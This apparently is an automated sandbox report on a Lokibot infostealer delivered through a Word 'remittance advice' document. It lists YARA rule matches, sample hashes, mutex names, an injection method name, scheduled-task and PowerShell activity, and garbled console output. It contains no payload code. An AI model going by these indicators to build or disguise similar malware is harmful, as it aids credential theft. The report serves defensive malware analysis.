Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs	Security API names: _0020.SetAccessControl
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs	Security API names: _0020.AddAccessRule
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 5.2.sharon38892.exe.4c0000.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.23c57ec.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.21de0e8.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.215e0d4.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 14.2.XxENUzWteJXT.exe.21ce0dc.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.216e0e0.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 5.2.sharon38892.exe.23557d8.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@24/25@100/5

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe

Code function: 21_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

21_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$B REmittance Advice.doc

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Mutant created: \Sessions\1\BaseNamedObjects\ikhgbYgue

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR666F.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......,.......H%.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......,.......T%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......,.......h%.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......,.......u%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......@.......H.......$........%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.$........%.........................s............H....... .......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........%.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......&.........................s............H.......$.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$.......#&.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$......./&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$.......M&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$......._&.........................s....................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$.......k&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....@.......H.......$.......}&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....@.......H.......$........&.........................s............H...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................O'.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................['.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................m'.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................y'.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P..............................'.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................'.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n................................'.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................'.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........(.........................s.................... .......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................(.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................+(.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................7(.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....I(.........................s....................$.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................U(.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P.............................g(.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................s(.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................(.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P..............................(.........................s..............".....l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................(.........................s..............................".............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P..............................(.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................(.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................8.......(.P.............................6 ......................................................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n................................B.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........C.........................s.................... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................'C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................;C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................IC.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....{C.........................s....................$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................C.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P..............................D.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................D.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............)E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............7E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............JE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............YE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......0.......H...............nE.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............\|E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........E.........................s.................... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
